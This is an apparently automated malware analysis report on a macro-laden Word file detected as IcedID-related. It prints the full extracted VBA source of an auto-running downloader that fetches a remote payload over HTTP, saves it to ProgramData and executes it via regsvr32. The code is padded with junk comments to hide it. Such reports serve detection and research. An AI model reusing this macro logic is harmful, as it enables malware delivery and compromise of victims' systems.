Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 7a9d68a282d629f7…

MALICIOUS

Office (OOXML)

Size: 140.3 KB
Created: 2020-10-13 11:02:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2020-10-16
MD5: 25fd349645419754bf92ff1150329f1f
SHA-1: 37eccaaf4a77d55abcd8dce78999a0fb1dc98fcb
SHA-256: 7a9d68a282d629f70382c6c96de2d686941045008762d31941940ff68977f78f
Risk Score: 230

Heuristics (6)

  • ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set ZaZny = CreateObject("Script" + AgsMH)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL and where it was found:
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartex In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/ink In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3d In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cex In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cid In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape In document text (OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 11783 bytes
SHA-256: 421c99eec8d5af69cc35afd4fae6d521855d557de5a8ef0ba034c491e3f047f4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "sgCej"
Sub zMYMk(fZvzC, Optional ByVal acHHl As String = "c:\programdata\GKLHy.txt", Optional ByVal AgsMH As String = "ing.FileSystemObject")
' Lures nasally helplessness
' Senoritas pencilled eavesdrop
' Drapes invitingly sinusoidal jerboas
' Impression allowing
' Nattering misrepresents commences
' Collapse cents
' Gossips prosecutable hakea
' Velour dutifulness consolations percussed
' Alarmism planting talker
' Subject satsumas goofing anticipation bonanza
' Thought clusters sturdiest peerless
' Jointed overpower joule bladders
' Unentered
' Hawaiian
' Bantered
' Shelf bitts leave matriarchies deepening
' Referent hardpressed
Set ZaZny = CreateObject("Script" + AgsMH)
' Soup cabby synthetics circadian
' Clearness crimped magmatic leniently
' Devalued economics sectioning apostasy
' Comestible unnervingly climbed
' Crosschecked frostier doted loaner sunrise
Set EdibZ = ZaZny.CreateTextFile(acHHl)
' Candelas
' Ladyship exotica overstates essen
' Overcoat decimation nasty
' Perplexedly rottenness historicist defining
' Divorce facilities fringy
EdibZ.WriteLine fZvzC
' Shuffling egret numskull seamstress crusher
' Interbreed
' Brisker feared
' Leadfree flack kinsmen
' Owners cavity lifeless
EdibZ.Close
' Chlorine copperplate perimeter snarl averred added flaunted
' Insomniacs possibly
' Setter pager quelled mechanistic belfry
' Escalate
' Garrison miner
' Brainlessness mended arcading
' Specialities
' Customise
' Lips discourteous seraphic unassailed
' Fragrances
' Negotiation neatens
' Aftercare permeated cloak powdery spike punitive
' Haemophiliacs allotted confederate colonial
' Defeater experience fatwa
' Extenuate stumpy absences indicating
' Amethystine pestilential condenser
' Extended
' Toothier tribunal furnished
' Oaks propane denoted retainer needs
' Interlocutors survivals granaries wary
' Goofs lenient
' Bags hover fleecy
' Surrealists garbling ebony strifes
' Shunning aliphatic
' Breezes disruptively part sac roulette
' Bonny flexion silhouetted accountancy airraid
' Appraises diminishes chairwomen votes
' Militates chambered manipulators hearsay womanise episcopacy
' Ballooning apportions undemocratic
' Temptations mobilises quailed
' Aqueous withers corroborate snoozing lactic
' Scalds
' Beholding loquacious
' Sweltering splattering percolate
' Totalitarian dote
' Withstood intersections trounces predisposed palatability
' Volunteer possession disassemble
' Custodial longitude
End Sub
' Sinusitis glittering discontented
' Trappings buccaneering disapprove
' Spars
' Steadygoing busybodies explore bard gunship consecrated
' Shudders contractually germinal
Sub AutoOpen()
' Six voice scoot spiced crofts
' Pork pyroxene
' Backwards pimply reciprocity
' Demilitarisation
' Jettisoning perseveringly
' Etui budded at
' Sixfold dissuaded likens
' Powerless provocations jilting
' Experimentalists
' Righthanded crispiest commissioners piteous renege
' Fusses curators channels
' Input impeachments retorting
' Pathos doorbells systolic
' Footprints blocky adaptability squirted
' Triviality grimacing teardrop
' Configured sportive genteel annoyers tremendously
' Assassination abstain pipeline
' Collisional outface
' Leakage photocopying
' Interoperability sunflower
' Ensemble sided
' Lab scoring shortages curses
' Hungriest superlatives
' Nestegg streetwise gumshoe
' Oedema suits
' Kingsized pertinent unprivileged
' Acidrain halting checklists magnolia silt
Dim GdSiS As New FMZUk
' Chancing repeats dysfunctional
' Paradoxical counterbalance humouring baggier salvages
' Exacerbating beaked busker
' Environmentalist
' Bacterium spiked regally ablates
' Crypts
' Abdominal tankard supercomputer dryness overpayment
fZvzC = GdSiS.VhfkK("MSXML2.serverXMLHTTP")
' Nonexistent
' Pathologies pooch
' Undernourishment gobbling drool
' Friskiest stockade
' Cervix isolated enumerable
' Strolls velodrome secretary
' Groundswell cornea emulator
zMYMk YXqlK(fZvzC)
' Lecher pupated
' Mannerism flavours laden
' Astronomer bearable verdure
' Typically comas groper
' Shortsightedness rifting
' Exhaustively grudgingly
' Bloodsports throwing afforestation wrestling
' Stole castaway lamina
' Disease chicanery tincture
' Graphical striver daunts
' Volts herb secessions whine
' Tubular decorator dismaying cortege
vxDJF kBNex(0) + "vr32 c:\programdata\GKLHy.txt", "ws"
End Sub
Function wijDG(tAPgr, ohCyp)
' Explains snits
' Three coda
' Slip
' Amours monthlies uncalibrated
wijDG = Split(tAPgr, ohCyp)
End Function

Attribute VB_Name = "wMBfi"
' Quartic clubroom smokeless clouding pureness renowned
' Insularity indexer richer
' Bevels steadfast
' Blasted exudate undergrounds postmen livelier overcapacity
' Sociable
' Comber resourceful
Function YXqlK(RpYMV)
' Soots
' Stablemate brotherhood
' Sleeplessness disinterested
' Walruses fulfil joked
YXqlK = StrConv(RpYMV, vbUnicode)
' Franc
' Churlishness absentmindedly mileposts nimbleness farmsteads unlicensed interrogatives
' Granular dawned complainingly
' Underskirt feminism
' Burgeoning san
End Function
' Exterminate loony infringes teenager
' Hoarser twinge really reformations
' Rainwater vestige casualty masseuses handy blackmailing hones tights
' Tropopause godsend scratchy
' Maturity centrifuges crumples
' Stopwatch vegetate drizzle burners breadwinner
Function JmLHe()
' Dublin sherries typifies uncreased
' Magneto antifreeze chandler hooray interesting
' Revitalise freezer homecoming authenticates
' Televised
' Episode axiomatic ballad
' Hymnal tuesday unorthodox cajole warmness
' Amalgams overspill oversensitivity ergodic argued
' Incurred extractions preserving appendix catchphrases
' Immunities seem
' Palaeontologist entail corroborates
With ActiveDocument.shapes(1)
JmLHe = .AlternativeText
End With
End Function
' Loves elongate expectancies
' Archaeology collectables speckled
' Canadian pesticide emotionally unclouded talented mysteriously hermetic
' Modality dismantling
' Muffler parlour kebabs similitude sinews
' Dimmest loads
Function kBNex(ccvfP)
' Splittings decay gyrating morphisms
' Fixation ringlets
' Deliberative solidarity juvenile flood
' Prince corrodes sating gratify
' Politically correctors
' Standardisation subroutine secateurs pulverised
' Chow helterskelter
' Pitted occupants earaches colonnade
' Telephony headmistress bladed cabbages moles
' Vulcanised dassie hexameter dahlia
' Nationalisation racketeering pedagogically roadway gagged
' Nullity refutable aupairs
FXSKU = JmLHe()
GufpG = wijDG(FXSKU, "###")
iUVCk = GufpG(ccvfP)
kBNex = iUVCk
End Function

Attribute VB_Name = "FMZUk"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Reverse(Text)
    Dim i As Integer
    Dim StrNew As String
    Dim strOld As String
    strOld = Trim(Text)
    For i = 1 To Len(strOld)
      StrNew = Mid(strOld, i, 1) & StrNew
    Next i
    Reverse = StrNew
End Function
' Froze governesses
' Ford crochets
' Hear
' Soldered conkers coquettish impracticability
Function VhfkK(bzaia)
' Sensation penknife
' Unbeliever gluttony motherofpearl syrups
' Protest
' Madrigals khaki soot import
' Blamelessly paining
' Subsoil sturdily legumes fidgety ascertains foramen tradings
Dim Ywxvu As Object
' Waistband
' Van polymers
' Iconographic splashy modernists
' Peculiar
' Computes lamed registers
' Unmemorable dankest deviate phonon
' Copulations crossbow healthiest forged clones churchman
' Fingerless interrupting
' Unobtrusive amputees profiteering submarines putt
' Guide angola mastering dismal tactile
' Screenwriter
' Relentless weddings prolongation nomad instigating
Set Ywxvu = CreateObject(bzaia)
' Tinge nylons
' Parametrisation tippling bleakness tumbled
' Earthbound shindig
' Devilled delaying gamy roundel
' Loser clone tolerating
' Dispensation quasar businesswoman
' Luxuriously juniper
' Receptor inundate boneless startups prejudicial
' Mostly guffaws responsibly notes eel
' Blameworthy wallflower reissued judiciously
' Foreseeing farmhouse
' Bogged gravitas propagate crimes
' Forgiven
' Fatherly innovating yaws petitions
' Rage goodlooking pecking
' Headlines testers
' Subclasses charlie
' Saving eg anchorite compatibility martens
' Ministering stashes wriggling
' Forceful
' Ladle emblematic gynaecology
' Presenting lovingly neuronal decorum
' Drugs deranged
' Unbroken iterating drown scotfree
' Proportional hail vulgarly
' Ripened undying
' Enviable fugitives tens prunings sagely
LJSGF = kBNex(1)
' Invasions reconsult hegemonic replier formic priories dispatcher
' Molar inconsiderateness bonbon
' Romping halfway herds normed digressed swung gals
' Pasty situate
Ywxvu.Open "GET", Reverse(LJSGF), False
' Absolved overnight
' Thinkable
' Librettists writings wafture boracic
' Ghastliest
Ywxvu.Send
' Culturally drools kedgeree sequin gamete
' Curtilage stammering parenthetical ablation
' Fewest saps
' Trap curd
' Endued mushroomed densitometry
' Awaits memorials deteriorates resea epistles
VhfkK = Ywxvu.responsebody
End Function

Attribute VB_Name = "HGhgQ"
Sub vxDJF(RHhQj, vToxs)
' Otherness gooey cellulite
' Cannoned indirection
' Disintegration attesting ruptures
' Romanticises wenches
' Decoupled expertly alluvia hexagon scowls dew
' Gallivanted liberals
Set rCNyB = CreateObject(vToxs + "cript.shell")
' Mostly prawns masks contemporaneity peddlers integrative
' Dubbed increase fishmonger
' Skyward rash
' Melancholic scarred girder ancestor troopship
' Magniloquent
' Veritable deceitfulness
' Illegibly strenuously exemplify
' Obscurely missile promised encircling
' Suckle impatiently beans
' Haulers familiarise
' Configurable hibernal
' Alcove diphtheria hoarsely
' Glimpses
' Punitive immovable depositions
' Disarrayed polity electrocardiographic answering sixteen enrichments
' Rakish stink rep quiveringly slowness
' Helpful martyr interdict
' Hoover frustratedly mappable
' Iceage calcify smilingly
' Needling onuses gawpin elbow
' Ranters mapper
' Phrenological limit kinematics sickens reporters
' Proletarians apogee rafting
' Lifesaving exponentiation
' Lawless interrelated
' Obnoxiously enhances
' Neuroscientists prompt
' Enraged stitches hart
' Ascetic participle drapers hiring dictator
' Interoperable driest sedater disheartened
' Stacking pilgrims sandbanks
' Heathen powersharing maseru encroaches circumscribing
' Corroboration apache kinetic
' Courtesan perverts grazing weathers retaliate
' Fastness licensing
' Admittance wheedled femininity constitutions
' Internal clued disguised
' Mist attired
' Cyprian invulnerability arrowed
' Authorised
' Pharmaceuticals uprightly cahoots wanton launches
' Sternum cultivates crimes incidents abstentions dirtiest
' Uncovers hones inefficiency tolerate
' Intensification truncate perverts
' Boohoo webs enemy multilayer
rCNyB.exec RHhQj
' Boastfulness strongmen inelegant
' Residues aspect mitigate shorted animation perversely lookalikes
' Parakeets
' Poverty spacial edges
' Impressionistic shipwrecked waiver
End Sub
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 44544 bytes
SHA-256: 65d998971008c5350aae82543eb567f2df5bd280eb98ed36a9fd7898ff0717e9
Detection
ClamAV: Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload: unlikely